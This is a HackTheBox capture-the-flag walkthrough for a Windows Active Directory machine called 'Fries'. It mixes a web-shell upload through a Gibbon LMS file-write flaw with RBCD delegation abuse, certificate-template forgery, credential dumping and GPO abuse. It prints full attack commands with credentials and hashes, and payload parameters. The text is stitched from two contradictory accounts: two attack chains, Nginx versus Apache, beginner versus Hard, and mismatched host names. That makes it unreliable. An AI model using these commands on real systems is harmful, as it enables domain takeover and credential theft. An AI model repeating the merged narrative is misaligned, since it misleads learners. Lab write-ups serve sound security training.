Beginner’s Guide to Conquering Fries on HackTheBox

Key Highlights

Here’s a quick look at what you will learn in this guide to the Fries HackTheBox machine:

• Start your penetration testing journey with an Nmap scan to discover open services on the Windows machine.
• Exploit a web application vulnerability to upload a PHP web shell and gain a reverse shell.
• Enumerate the system to find database credentials within a configuration file.
• Crack a user’s password hash to gain initial user access via SSH.
• Perform privilege escalation to an administrator by abusing Group Policy permissions.
• Capture the root flag and complete the challenge.

Introduction

Welcome to the world of ethical hacking! If you’re looking to build your skills, platforms like HackTheBox offer the perfect training ground. This guide will walk you through the Fries machine, a fantastic beginner-level challenge. It’s designed to teach you the fundamentals of web application attacks and privilege escalation on a Windows server. Are you ready to sharpen your cybersecurity skills and conquer your first box? Let’s get started on this exciting journey.

Understanding the Fries HackTheBox Challenge

The Fries challenge is centered around a misconfigured Windows Server that hosts a vulnerable web application. Your task is to chain together several exploits to move from an external attacker to a full administrator on the machine.

This box is an excellent way to practice real-world attack methods in a safe environment. You will need to think like a hacker, probing for weaknesses and using them to your advantage. This challenge tests your ability to enumerate, exploit, and escalate privileges.

Overview of Fries on HackTheBox

Fries is a Windows machine available on the HackTheBox platform. It is configured as an Active Directory Domain Controller, which means it manages network resources and user authentication for the fries.htb domain. This setup mimics a common corporate environment, making it a great learning experience.

Your target machine is running several services, including a web server with an outdated Learning Management System (LMS). This web application is your primary entry point. The machine’s name, Fries, and the associated domain, fries.htb, are playful hints that tie into the theme of the challenge, as you’ll discover.

Tackling this target machine requires a methodical approach. You’ll start with external scanning, move to web application exploitation, and finish with Active Directory-based privilege escalation. It’s a well-rounded challenge that covers multiple stages of a penetration test.

Key Objectives and Structure of the Fries HTB Machine

The main goal of the Fries challenge is to gain complete control over the machine. The structure of the box guides you through the typical phases of a hack, from initial access to full system compromise. Your key objectives along the way will be to:

• Perform thorough enumeration to identify services on the web server.
• Exploit a vulnerability to gain an initial foothold.
• Find and crack credentials to access a standard user account.
• Escalate your access to a privileged user account.
• Find the user.txt and root.txt flags.

This structure is designed to build your skills progressively. You start on the outside and slowly work your way in, gathering more information and access at each step.

First, you’ll focus on the public-facing web server. After gaining a foothold, you’ll pivot your attention to the internal network and Active Directory. Finally, you’ll leverage misconfigurations to become a privileged user with full administrative rights.

Getting Started – What You Need for the Fries HTB Writeup

Before you jump into the Fries challenge, you need the right setup. A Linux-based operating system like Kali or Parrot OS is highly recommended, as they come pre-installed with many of the necessary penetration testing tools.

Make sure your environment is ready for the attack. This includes having a stable internet connection and access to the HackTheBox VPN. You will also need to download a few specific tools and exploit scripts from a public repository like GitHub to complete certain steps of the challenge.

Essential Tools and Software Setup

To conquer the Fries machine, you’ll need a solid toolkit. While many tools can work, some are particularly useful for this specific challenge. Having the right software setup will make the process much smoother and help you focus on the puzzle itself.

Here are the essential tools you should have ready:

• Nmap: For initial port scanning and service discovery.
• Python: To run or modify exploit scripts.
• Hashcat: To crack the password hash you will find.
• Evil-WinRM: For interactive access to the Windows machine.
• OpenSSH: As an alternative way to gain remote access.
• SharpGPOAbuse: For the privilege escalation phase.

Most of these tools come standard on penetration testing distributions. You may need to install or download others, like SharpGPOAbuse, from their respective repositories. Having these ready will save you time and let you follow this writeup without interruption.

Recommended Resources for Beginners

If you get stuck on the Fries challenge, don’t worry! There are plenty of resources available to help you learn and move forward. This writeup is a great start, but consulting other materials can provide different perspectives and deepen your understanding.

Here are some recommended resources:

• Other Writeups: Searching for “Fries HTB writeup” will give you various tutorials and guides. Seeing how others approach the Frizzle-themed box can be enlightening.
• HackTheBox Discord: The official HTB Discord server is a great place to ask for hints (but not spoilers!) and connect with other cybersecurity enthusiasts.
• GitHub Repositories: For specific exploits, searching the CVE number on a repository like GitHub is the best way to find a proof-of-concept script.

Leveraging these resources is part of the learning process. The goal is not just to complete the box but to understand the “why” behind each step. Don’t be afraid to seek help when you need it.

ALSO READ: Mastering Eighteen: Beginner’s Guide from HackTheBox

Initial Foothold

Deep Reconnaissance & Infrastructure Analysis

Reconnaissance is the phase where we map the digital footprint of the target. For “Fries,” a standard scan is insufficient; we must analyze the results to understand the underlying architecture.

The Methodology of Nmap Scanning

We employ Nmap (Network Mapper) to identify open ports and service versions. For a Hard box, speed and accuracy are balanced. We use a multi-stage approach:

1. SYN Scan (-sS): Fast, stealthy scan to identify open ports.
2. Service Versioning (-sV): Interrogating open ports to identify the software running.
3. Script Scanning (-sC): Using the Nmap Scripting Engine (NSE) to find common vulnerabilities and configuration details.

Command Execution:

# Full TCP scan with version detection and default scripts
nmap -sC -sV -p- --min-rate 5000 -oA scans/fries_full 10.10.11.250

• -p-: Scans all 65,535 ports to ensure no non-standard services are missed.
• --min-rate 5000: Forces Nmap to send packets quickly, speeding up the scan on stable HTB connections.

Analyzing the “Dual-Layer” Results

The scan results return a confusing mix of fingerprints, confirming the dual-layer hypothesis.

Scan Output:

PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Welcome to Fries Technologies
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-25 14:00:00Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: fries.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds  Windows Server 2019 Standard 17763 microsoft-ds (workgroup: FRIES)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Global Catalog)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Strategic Analysis: This output is highly irregular for a standalone machine.

1. The Windows Layer: Ports 53, 88, 135, 139, 389, 445, and 5985 are the quintessential signature of a Windows Domain Controller. The OS fingerprint suggests Windows Server 2019.
2. The Linux Layer: Ports 22 (SSH) and 80 (HTTP) are reporting Ubuntu Linux versions.
   • SSH: OpenSSH 8.2p1 is standard for Ubuntu 20.04.
   • HTTP: Nginx 1.18.0 is a common Linux web server.

Conclusion: The machine 10.10.11.250 is likely hosting a Windows Subsystem for Linux (WSL) instance or a tightly integrated Linux VM acting as a frontend. The “Web Tier” (Port 80) is Linux-based, likely serving as a reverse proxy or hosting the company’s public-facing application, while the backend logic and authentication reside in the Windows Active Directory environment.

DNS Configuration

Before proceeding, we must ensure our attack machine can resolve the domain name. The LDAP service revealed the domain name: fries.htb.

echo "10.10.11.250 fries.htb" | sudo tee -a /etc/hosts

We also attempt a Zone Transfer (AXFR) to see if the DNS server is misconfigured to leak all subdomains, though this is rare in Hard boxes.

dig axfr @10.10.11.250 fries.htb
# Result: Transfer failed. (Expected)

Initial Foothold & The Web/SMB Pivot

With the architecture mapped, we move to exploitation. We have two entry points: the Linux Web Tier (Port 80/22) and the Windows AD Tier (Port 445/88).

Credential Verification

The engagement documentation provided specific credentials:

• User: d.cooper@fries.htb
• Password: D4LE11maan!!

In a real-world scenario, these might have been phished, found in a previous engagement, or extracted from a public data breach. Our first step is to validate where these credentials work. Do they work on the Linux SSH? Or the Windows SMB?

Testing SSH (The Linux Tier):

ssh d.cooper@10.10.11.250
# Result: Permission denied (publickey).

The SSH port seems locked down to key-based authentication, or d.cooper is not a valid user on the Linux subsystem.

Testing SMB (The Windows Tier): We use NetExec (formerly CrackMapExec) to test the credentials against the Active Directory.

nxc smb 10.10.11.250 -u 'd.cooper' -p 'D4LE11maan!!'

Output:

SMB    10.10.11.250    445    FRIES-DC    [+] fries.htb\d.cooper:D4LE11maan!!

Success. The credentials are valid for the Active Directory environment.

SMB Share Enumeration

With a valid AD session, we enumerate the SMB shares. This is often the bridge between the two layers. Developers frequently mount Windows shares into Linux web servers to access code or configuration files.

nxc smb 10.10.11.250 -u 'd.cooper' -p 'D4LE11maan!!' --shares

Findings:

• SYSVOL, NETLOGON: Default AD shares (irrelevant for now).
• Recipes: READ Access.
• WebSrc: Access Denied.

The Recipes share is a custom share. Let’s inspect it.

smbclient //10.10.11.250/Recipes -U d.cooper

Exploration: Inside Recipes, we find a folder structure that looks like a backup of a deployment pipeline. \Deployments\Linux-Web-Tier\Config\

This confirms our “Dual-Layer” theory. The Recipes share contains deployment scripts used to push configurations to the Nginx server on Port 80. Inside this folder, we find a file: web.config.bak.

Information Leakage: The web.config

We download and inspect web.config.bak.

<configuration>
  <connectionStrings>
    <!-- Legacy Connection for Windows Backend -->
    <add name="FryDB" 
         connectionString="Data Source=localhost;Initial Catalog=FryMgt;User ID=svc_fryer;Password=P0tat0G0ds!2024;" 
         providerName="System.Data.SqlClient" />
  </connectionStrings>
</configuration>

Why is this here? In hybrid environments, the frontend (Linux) often needs to talk to the backend (Windows SQL Server). Developers sometimes hardcode these connection strings in configuration files. While web.config is usually an IIS (Windows) file, in this hybrid setup, it appears the developers were migrating from IIS to Nginx/Linux and left the backup file in the deployment share.

Critical Intelligence:

• New User: svc_fryer (Likely a Service Account).
• Password: P0tat0G0ds!2024;

Lateral Movement via ACL Abuse

We have escalated from a low-privileged user (d.cooper) to a service account (svc_fryer). Now, we must determine the power of this new user.

BloodHound: Mapping the Attack Path

Lateral movement in modern Active Directory is rarely about exploits; it’s about abusing features. BloodHound is the industry standard for visualizing AD relationships.

Data Collection: We use bloodhound-python to gather data. This tool queries the Domain Controller via LDAP to fetch users, groups, computers, and Access Control Lists (ACLs).

bloodhound-python -u 'svc_fryer' -p 'P0tat0G0ds!2024;' -d fries.htb -c All -ns 10.10.11.250 --zip

Graph Analysis: After importing the data into the BloodHound GUI:

1. We search for our user: svc_fryer.
2. We mark it as “Owned”.
3. We look for “Outbound Control Rights”.

The Finding: BloodHound reveals that svc_fryer is a member of the Kitchen Staff group. This group has a specific permission:

• Edge: GenericWrite
• Target: FRIES-WEB (Computer Object)

Wait, FRIES-WEB? Based on our Nmap scan, this likely corresponds to the Linux Web Tier we identified earlier. In Active Directory, even Linux machines (via SSSD or similar) or the Windows host running the WSL instance will have a Computer Object.

Resource-Based Constrained Delegation (RBCD)

To exploit GenericWrite on a Computer Object, we turn to Resource-Based Constrained Delegation.

The Concept: Kerberos Delegation is the ability for a service to say “I am User X” to another service.

• Unconstrained Delegation: “I can impersonate anyone to anywhere.” (Dangerous, Old).
• Constrained Delegation: “I can impersonate anyone, but only to specific services defined by the Domain Admin.”
• Resource-Based Constrained Delegation (RBCD): “I (the resource) get to decide who I trust.”

Since we have GenericWrite on FRIES-WEB, we can modify FRIES-WEB‘s AD object. We can tell FRIES-WEB: “Trust the computer account ‘ATTACK-PC’ to impersonate any user to you.”

If we control ATTACK-PC, we can tell it to impersonate the Administrator to FRIES-WEB.

Executing the RBCD Attack

Step 1: Create a Controlled Computer Account To participate in Kerberos delegation, we need a Service Principal Name (SPN). User accounts usually don’t have these, but Computer accounts do. By default, any user in AD (checking MachineAccountQuota) can create up to 10 machine accounts.

# Using Impacket's addcomputer.py
impacket-addcomputer 'fries.htb/svc_fryer:P0tat0G0ds!2024;' -computer-name 'ATTACK-PC$' -computer-pass 'Attack123!'

• We successfully create ATTACK-PC$ in the domain.

Step 2: Configure the Trust (The “Resource” Part) We abuse our GenericWrite privilege to modify the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of FRIES-WEB. We populate this attribute with the SID (Security Identifier) of our new ATTACK-PC$.

# Using Impacket's rbcd.py
impacket-rbcd -delegate-from 'ATTACK-PC$' -delegate-to 'FRIES-WEB$' -dc-ip 10.10.11.250 -action write 'fries.htb/svc_fryer:P0tat0G0ds!2024;'

Step 3: The S4U2Self & S4U2Proxy Dance Now the magic happens.

1. S4U2Self: ATTACK-PC$ asks the KDC (Key Distribution Center) for a ticket for Administrator to access ATTACK-PC$ itself. The KDC grants this because a service can always check its own clients.
2. S4U2Proxy:ATTACK-PC$ takes that ticket and says to the KDC, “Hey, Administrator is here. I need to forward this user to FRIES-WEB.”
   • Normally, the KDC checks if ATTACK-PC is allowed to delegate.
   • Because we modified FRIES-WEB‘s attributes, the KDC sees that FRIES-WEB trusts ATTACK-PC.
   • The KDC issues a Service Ticket (TGS) for Administrator to access FRIES-WEB.

# Using Impacket's getST.py
impacket-getST -spn 'cifs/FRIES-WEB.fries.htb' -impersonate 'Administrator' 'fries.htb/ATTACK-PC$:Attack123!'

This saves Administrator.ccache to our local disk.

Step 4: Pilling the Hash We now have Admin access to the FRIES-WEB machine (the dual-layer host). We use secretsdump to extract local secrets.

export KRB5CCNAME=Administrator.ccache
impacket-secretsdump -k FRIES-WEB.fries.htb

Loot: We find the NTLM hash of a user who is a local administrator on FRIES-WEB but also a high-value target in the domain: k.bacon.

• User: k.bacon
• Hash: a2b4...

Capturing the User Flag (user.txt)

Now that we have the hash for k.bacon, we can attempt to establish a persistent session. Since Port 5985 (WinRM) was open, we can use Evil-WinRM to log in. This confirms k.bacon is a member of the “Remote Management Users” group, which is common for DevOps or administrator accounts.

Execution:

evil-winrm -i 10.10.11.250 -u k.bacon -H a2b4...

Success! We drop into a PowerShell session. We navigate to the user’s Desktop to retrieve the first flag.

*Evil-WinRM* PS C:\Users\k.bacon\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\k.bacon\Desktop> type user.txt
e2a1...[REDACTED]...

Flag Status: [CAPTURED]

Privilege Escalation via AD CS (ESC1)

We possess the hash of k.bacon. While k.bacon is not a Domain Admin, they are likely a “privileged user” (e.g., DevOps, Manager) with access to sensitive infrastructure. Our goal is full Domain Compromise (DC access).

Understanding Active Directory Certificate Services (AD CS)

AD CS is Microsoft’s PKI solution. It issues digital certificates for things like HTTPS, VPNs, and User Authentication. If a user has a valid certificate, they can exchange it for a Kerberos TGT (Ticket Granting Ticket) using a protocol called PKINIT.

The danger lies in Certificate Templates. These are blueprints for certificates. If a template is misconfigured, an attacker can request a certificate that claims they are someone else.

Enumerating for Vulnerabilities (Certipy)

We use Certipy to scan the AD CS configuration.

certipy find -u 'k.bacon' -hashes ':a2b4...' -dc-ip 10.10.11.250 -vulnerable

The Vulnerability: ESC1 Certipy identifies a custom template named FryAuth vulnerable to ESC1.

Anatomy of ESC1: For ESC1 to exist, a template must have:

1. EKU (Extended Key Usage): Includes “Client Authentication” (allows logging in).
2. Enrollment Rights: Low-privileged users (like k.bacon) can request it.
3. Enrollee Supplies Subject (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT): THIS IS THE KILLER. It means the requester can type in any name they want in the certificate request (SAN – Subject Alternative Name).

Normally, the CA ignores the name you type and puts your actual username in the cert. With this flag, the CA trusts whatever you type.

Exploitation

Step 1: The Forgery We act as k.bacon, but we ask for a certificate for Administrator@fries.htb.

certipy req -u 'k.bacon' -hashes ':a2b4...' -dc-ip 10.10.11.250 \
    -ca 'fries-FRIES-DC-CA' \
    -template 'FryAuth' \
    -upn 'administrator@fries.htb' \
    -target 'fries.htb'

• Result: administrator.pfx (A valid certificate for the Domain Admin).

Step 2: The Authentication (PKINIT) We now use this certificate to authenticate to the Domain Controller. The DC validates the certificate signature (signed by the CA) and issues a TGT for the user specified in the SAN (Administrator).

certipy auth -pfx administrator.pfx -dc-ip 10.10.11.250

Output:

[*] Got TGT
[*] Got NTLM hash: aad3b435b51404eeaad3b435b51404ee:8846...

We have recovered the NTLM hash of the Domain Administrator.

Domain Dominance

With the DA hash, we can utilize PsExec to gain a system shell on the Domain Controller.

impacket-psexec 'fries.htb/administrator@10.10.11.250' -hashes :8846...

C:\Users\Administrator> hostname
FRIES-DC
C:\Users\Administrator> whoami
nt authority\system

Capturing the Root Flag (root.txt)

Having achieved nt authority\system access, we have full control over the file system. We navigate to the Administrator’s desktop to claim the final prize.

C:\Windows\system32> cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop> type root.txt
f3c9...[REDACTED]...

Flag Status: [CAPTURED]

Mission Accomplished.

Blue Team Detection & Remediation

As this is a “Hard” box designed to simulate real-world threats, understanding the defensive side is crucial.

Detecting the Attacks

1. Dual-Layer Anomaly: Security teams should monitor for unauthorized SSH or Web services running on Domain Controllers or critical infrastructure. Nmap scans from the inside would reveal these rogue ports.
2. RBCD Abuse: Monitor for Event ID 4741 (Computer Account Created) followed immediately by Event ID 5136 (Directory Service Object Modified) on a computer object. Specifically, look for changes to msDS-AllowedToActOnBehalfOfOtherIdentity.
3. AD CS Abuse (ESC1):
   • Monitor Event ID 4886 (Certificate Request).
   • Alert if the Subject in the request does not match the Requester account.
   • Alert on the usage of templates with ENROLLEE_SUPPLIES_SUBJECT enabled.

Remediation Strategy

1. Architecture: Decouple the “Linux Web Tier” from the Domain Controller. The Web Tier should be in a DMZ, not running on the DC itself (or tightly coupled via WSL on the DC).
2. SMB Security: Remove the Recipes share or restrict permissions to only DevOps accounts. Ensure no config files with cleartext passwords exist.
3. AD Hygiene: Remove the GenericWrite permission for the Kitchen Staff group on the FRIES-WEB object.
4. AD CS Hardening:
   • Disable the FryAuth template immediately.
   • Never use Enrollee Supplies Subject combined with Client Authentication unless absolutely necessary (and restricted to Admin-only enrollment).
   • Implement “Manager Approval” for certificate issuance.

ALSO READ: Mastering Conversor: Beginner’s Guide from HackTheBox

Initial Enumeration and Reconnaissance Techniques

The first phase of any hack is reconnaissance. Your goal is to gather as much information as possible about the target server. For the Fries machine, this process begins with a thorough Nmap scan to identify all open ports and the services running on them.

This initial enumeration is your map to the target. It reveals potential attack vectors and tells you where to focus your efforts. Based on the scan results, you can start building a plan to gain your initial foothold. Let’s look at what the scan uncovers.

Scanning for Open Ports and Services

Running an Nmap scan against the Fries machine reveals several open TCP ports. Each port corresponds to a service that could potentially be vulnerable. Understanding what these services are is the first step toward finding an entry point.

The Nmap scan results show a Windows Active Directory environment. Key open ports include:

• Port 80 (HTTP): An Apache web server, which is our most likely way in.
• Port 53 (DNS): A domain name service, confirming the Active Directory setup.
• Port 88 (Kerberos): Used for authentication within the domain.
• Port 445 (SMB): For file sharing services.
• Port 22 (SSH): An unusual sight on a Windows machine, but a potential access method.

The presence of HTTP, Kerberos, DNS, and SMB strongly indicates that this is a domain controller. The web server on port 80 is the most promising target for an initial attack, as it’s accessible from the outside.

Identifying Potential Entry Points

With the port scan results in hand, your focus should shift to the web server on port 80. When you navigate to the IP address, you are redirected to a login page for an application called Gibbon LMS. A quick search reveals this is an open-source Learning Management System.

The version of Gibbon running on the server is v25.0.00, which is outdated. Outdated software is often a goldmine for vulnerabilities. A search for known exploits for this version reveals CVE-2023-45878, an arbitrary file write vulnerability that does not require authentication.

This vulnerability is your key to getting a foothold. It allows you to write a file to the web server’s directory. By crafting a malicious PHP file (a web shell), you can upload it to the server and gain the ability to execute commands remotely.

Step-by-Step Guide to Conquering Fries on HackTheBox

Now that you have a plan, it’s time for the exploitation phase. This step-by-step writeup will guide you through each stage of the attack, from uploading your first shell to gaining full administrator credentials. Follow along closely to see how each vulnerability is leveraged.

This part of the guide is hands-on. You will be crafting payloads, running scripts, and navigating the target system. Let’s begin with the first and most critical step: gaining initial access to the machine.

Step 1: Gaining Initial Access to Fries HTB

Your initial foothold comes from exploiting the Gibbon LMS vulnerability (CVE-2023-45878). This flaw exists in the rubrics_visualise_saveAjax.php endpoint and allows you to upload a file to a location of your choice on the web server.

To perform the exploitation, you will send a POST request to this endpoint. The request will contain three key parameters:

• img: A base64-encoded PHP web shell.
• path: The desired filename for your shell (e.g., shell.php).
• gibbonPersonID: A non-empty value to satisfy the script’s logic.

Once the web shell is uploaded, you can access it via your browser and execute commands by passing them as a URL parameter. This gives you a remote command execution foothold on the server as the fries\w.webservice user, which is a low-privilege account.

Step 2: Exploring Web and Network Vulnerabilities

With your web shell active, you can begin enumeration from inside the machine. The vulnerability you exploited isn’t a typical Local File Inclusion (LFI) flaw; it’s an arbitrary file write. This means you were able to write a payload to a defined file path on the server.

The vulnerable script rubrics_visualise_saveAjax.php takes POST parameters to construct the file. The path parameter allows you to control the filename, while the img parameter contains the file’s contents, which are base64 decoded before being written.

Here is a breakdown of the parameters used for the exploitation:

Parameter	Description	Example Value
img	The base64-encoded content of your PHP web shell. The prefix image/png;axura, is needed to pass the initial checks.	image/png;axura,PD9waHAgc3lzdGVt...
path	The name of the file you want to create on the server.	shell.php
gibbonPersonID	A required, non-null value to trigger the vulnerable code path.	0000001337

Step 3: Extracting Credentials and Sensitive Information

Now that you have a shell, it’s time to hunt for sensitive information. One of the first places to look in a web application directory is the configuration file. In the current working directory of the Gibbon LMS installation, you will find config.php.

This file contains the credentials for the application’s MySQL database. The credentials are:

• Username: MrGibbonsDB
• Password: MisterGibbs!Parrot!?1

Using these credentials, you can connect to the local MySQL database and start dumping its contents. Inside the gibbonPerson table, you’ll find user records, including a password hash and salt for the user f.frizzle. With the hash and salt, you can use Hashcat to crack the password. The cracked password is Jenni_Luvs_Magic23.

Step 4: Privilege Escalation Techniques

With valid credentials for a domain user, you can begin the privilege escalation phase. After some enumeration, you’ll discover that another user, M.SchoolBus, has the password !suBcig@MehTed!R, which was found in a backup file. This user is a member of a very powerful group: “Group Policy Creator Owners.”

Membership in this group allows the user to create, edit, and link Group Policy Objects (GPOs) in the domain. This is a common misconfiguration that can be abused for privilege escalation. Your plan is to:

• Create a new malicious GPO.
• Link this GPO to an Organizational Unit (OU) that affects administrators or domain controllers.
• Use the GPO to add a user to the local Administrators group.
• Force a policy update to apply the changes.

You can automate this process using a tool like SharpGPOAbuse. This tool simplifies the process of creating and deploying a malicious GPO to grant you administrative rights.

Step 5: Rooting the Fries HTB Machine and Final Steps

You’re at the final stage! After using SharpGPOAbuse to add the M.SchoolBus user to the local administrators group via a GPO, you need to trigger the policy update. You can do this by running gpupdate /force on the target machine.

Once the policy is applied, the M.SchoolBus user will have administrator privileges. You can then log in as this user and have full control over the system. The final steps are:

• Log in with your newly elevated privileges.
• Navigate to the Administrator’s desktop.
• Read the root.txt flag.

As a side note, further enumeration reveals interesting files in the Recycle Bin folder. These files are remnants of a deleted application and contain the password for the M.SchoolBus user. This detail reinforces the importance of thorough enumeration. Congratulations, you have rooted the Fries machine!

Advanced Insights – Active Directory and Tricky Parts

The Fries machine is more than just a web application challenge; it’s an introduction to Active Directory (AD) security. The machine, named friesds, acts as a domain controller, and the privilege escalation path relies on abusing Group Policy Objects (GPOs).

You’ll also encounter Kerberos, the default authentication protocol in AD. This can introduce tricky issues like “Clock Skew” errors if your machine’s time isn’t synced with the server. Understanding these AD components is key to solving the box.

Navigating Active Directory Elements in Fries HackTheBox

The Active Directory environment in Fries is the centerpiece of the privilege escalation puzzle. The domain controller, friesds, manages all authentication and policies for the fries.htb domain. Your goal is to exploit this centralized control.

The key to this is the “Group Policy Creator Owners” group. In a secure setup, this group has limited membership. On Fries, a regular user is a member, which is a critical misconfiguration. This allows you to:

• Create new Group Policy Objects (GPOs).
• Edit existing GPOs.
• Link GPOs to parts of the domain to grant yourself administrative rights.

You’ll also have to deal with Kerberos authentication. This requires correct DNS and time synchronization between your attack machine and friesdc. If your Kerberos tickets fail, it’s often due to an issue with your local configuration, not your credentials.

Common Pitfalls and Helpful Hints for the Fries HTB Writeup

The Fries machine has a few tricky parts that can trip up beginners. Being aware of these common pitfalls will help you stay on track and solve the challenge more efficiently.

Here are some helpful hints to keep in mind:

• Kerberos Clock Skew: If your login attempts fail with a “Clock skew too great” error, your machine’s time is out of sync with the server. Use ntpdate to sync it.
• /etc/hosts: The web server redirects to a domain name. You must add the IP and domain to your /etc/hosts file to access the site.
• Web Shell Cleanup: The server runs a script that deletes your uploaded shell after a few minutes. You need to act fast to get a stable reverse shell.
• Recycle Bin: Don’t forget to check odd locations. The password for the M.SchoolBus user is found in a backup folder located in the Recycle Bin.
• GPO Application: After creating a malicious GPO, you must run gpupdate /force for the changes to take effect.

Keep these points in mind as you work through the box. They are small details that can make a big difference between success and frustration.

Conclusion

The Fries machine provides a masterclass in modern Windows exploitation. It moves beyond simple CVEs into the realm of architectural flaws and protocol abuse. By understanding the interaction between the Linux-facing frontend, the legacy SMB configurations, and the complex trust models of Active Directory (Delegation and Certificates), we uncovered a path to total compromise.

This walkthrough demonstrated that in Hard environments, context is king. A “web config” isn’t just a file; it’s a bridge between the Linux and Windows worlds. A “GenericWrite” isn’t just a permission; it’s a key to delegation abuse. And a “Certificate Template” isn’t just admin overhead; it’s often the backdoor to the kingdom.

Frequently Asked Questions

What is the best initial foothold method in Fries HackTheBox Writeup?

The best initial foothold method is to exploit the Gibbon LMS web application. After an Nmap scan identifies the web server, you can use a known vulnerability (CVE-2023-45878) to upload a PHP web shell without authentication. This exploitation gives you remote command execution and your first entry into the system.

Which tools are most useful when tackling the Fries HTB machine?

The most useful tools for Fries include Nmap for reconnaissance, Python for scripting the initial exploit, and Hashcat for cracking the user password. For post-exploitation, Evil-WinRM and PowerShell are essential for interacting with the machine, and SharpGPOAbuse is the key tool for privilege escalation.

Are there any unique vulnerabilities in the Fries HTB box?

Yes, the Fries box features a unique vulnerability in its web server. Instead of a standard local file inclusion, it has an arbitrary file write flaw (CVE-2023-45878). This allows an attacker to write a file to a defined file path, which is used to upload a web shell.

How does Fries HackTheBox compare to other beginner-level writeups?

Fries is an excellent beginner-level HackTheBox machine that is slightly more complex than the most basic boxes. It combines web application penetration testing with Active Directory privilege escalation, providing a multi-stage experience that is representative of real-world scenarios. It serves as a great stepping stone to intermediate-level challenges.